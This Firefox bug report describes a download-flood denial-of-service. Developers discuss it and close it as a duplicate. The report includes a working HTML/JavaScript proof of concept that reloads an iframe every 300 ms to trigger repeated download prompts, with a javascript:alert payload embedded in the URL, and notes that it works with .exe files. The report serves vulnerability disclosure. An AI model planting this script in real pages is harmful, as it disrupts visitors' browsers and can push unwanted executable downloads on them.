1491201 - DOS Attack using swf file resulting an firefox browser download of death

Status: RESOLVED DUPLICATE of bug 1306334

(Firefox :: Downloads Panel, defect)

Description

[wilsonmabutolvii]

Attachment: poc-firefox.7z

firefox version: latest version 62.0 64bit
operating system version: Tested in windows 10 and also in Debian linux , this must work also in another operating system that use firefox


hi. when I'm testing about an bug bounty program in bugcrowd. I come across with a domain with swf file using js extractor. When I'm about to click the swf website url. the firefox imediately pop up an download, where in when i test in google chrome the swf file was block and need to take another steps which say trust or not.
so i created an simple script that can automaticaly download the file when user visit the website injected with simple script. 
when an victim visit the webpage injected by swf javascript. the victim firefox browser will pop up an loop download 

step by step
1. download an firefox and update it in latest version
2. search for an example swf file. i use google for example of swf file
3. upload the swf, here I use facebook.com for uploading the swf in chat attachment
optional 4. (this is steps if you will use facebook for uploading the swf) go to facebook, login with your account. go to message upload the swf file in the attachement. click the swf and copy the url.
5. inject the scripts here
<iframe src="about:blank" id="x"></iframe>
<script>u='https://cdn.fbsbx.com/v/t59.2708-21/41550622_293465564799023_112072305391173632_n.swf/swfPrintableContainer-46.swf?_nc_cat=0&oh=50ea728bf20fc5b296dcebb627a20548&oe=5B9B635A&dl=1?buttonDisabled=&buttonText=%3Ca%20%20href=%22javascript:alert(document.domain)%22%3EDOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS%3C/a%3E&buttonImageURL=/&buttonTextStyle=a{color:%23ff00ff}&buttonAction=-120&buttonCursor=-2';
setInterval(function(){document.getElementById('x').contentWindow.location=u},300)</script>

just change the url if you uploaded your own swf file

6. go to notepad or other editor that you have and copy paste the script and make it an yourexamplename.html
7. upload it on your own webserver or just open it your localhost in firefox latest version and you will see an numerous download pop up which firefox doesnt block the automatic pop up download

Comment 1

[:Gijs (he/him)]

Paolo, from a quick look at:

u='https://cdn.fbsbx.com/v/t59.2708-21/41550622_293465564799023_112072305391173632_n.swf/swfPrintableContainer-46.swf?_nc_cat=0&oh=50ea728bf20fc5b296dcebb627a20548&oe=5B9B635A&dl=1?buttonDisabled=&buttonText=%3Ca%20%20href=%22javascript:alert(document.domain)%22%3EDOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS<br />DOS%3C/a%3E&buttonImageURL=/&buttonTextStyle=a{color:%23ff00ff}&buttonAction=-120&buttonCursor=-2';
setInterval(function(){document.getElementById('x').contentWindow.location=u},300)

the issue here is just that we take an iframe and every 300ms point it to something that pops up a download prompt. I expect we have this on file already, is that right?

Comment 2

[wilsonmabutolvii]

yes thats right sir, take an iframe and every 300 ms it will pop up an download prompt which firefox doesnt block. if you test it in google chrome the download will block and you will be ask if you want to unblock it,and the file will be flag malicious file in download browser,

I'm cant understand about you say "we have this on file already" can you please shed some more light on this please, thanks

Comment 3

[wilsonmabutolvii]

if you want to make the pop up download faster we just need to lower the 300ms example 100 ms .

Comment 4

[wilsonmabutolvii]

hi. I tested it in different file types like .cert and .exe and it's working also in this file type.

Comment 5

[:Paolo Amadini]

(In reply to :Gijs (he/him) from comment #1)
> the issue here is just that we take an iframe and every 300ms point it to
> something that pops up a download prompt. I expect we have this on file
> already, is that right?

Yes, and while the specifics may vary from case to case, this is basically a variant of bug 1306334.

(In reply to wilsonmabutolvii from comment #2)
> I'm cant understand about you say "we have this on file already" can you
> please shed some more light on this please, thanks

This means that we already know about this issue (as in the expression "to file a bug"). There is the bug I mentioned, and probably we have other bugs on file for specific cases too.

Comment 6

[wilsonmabutolvii]

(In reply to :Paolo Amadini from comment #5)
> (In reply to :Gijs (he/him) from comment #1)
> > the issue here is just that we take an iframe and every 300ms point it to
> > something that pops up a download prompt. I expect we have this on file
> > already, is that right?
> 
> Yes, and while the specifics may vary from case to case, this is basically a
> variant of bug 1306334.

yeah it seems a variant of bug 1306334

> (In reply to wilsonmabutolvii from comment #2)
> > I'm cant understand about you say "we have this on file already" can you
> > please shed some more light on this please, thanks
> 
> This means that we already know about this issue (as in the expression "to
> file a bug"). There is the bug I mentioned, and probably we have other bugs
> on file for specific cases too.

thanks for clarifying . I think we need to implement an blocking the multiple file automatically asking the user if it want to allow multiple download in this site.

Comment 7

[:Gijs (he/him)]

(In reply to wilsonmabutolvii from comment #6)
> thanks for clarifying . I think we need to implement an blocking the
> multiple file automatically asking the user if it want to allow multiple
> download in this site.

Yes, we agree - that's why bug 1306334 is there. We can mark this bug as a duplicate.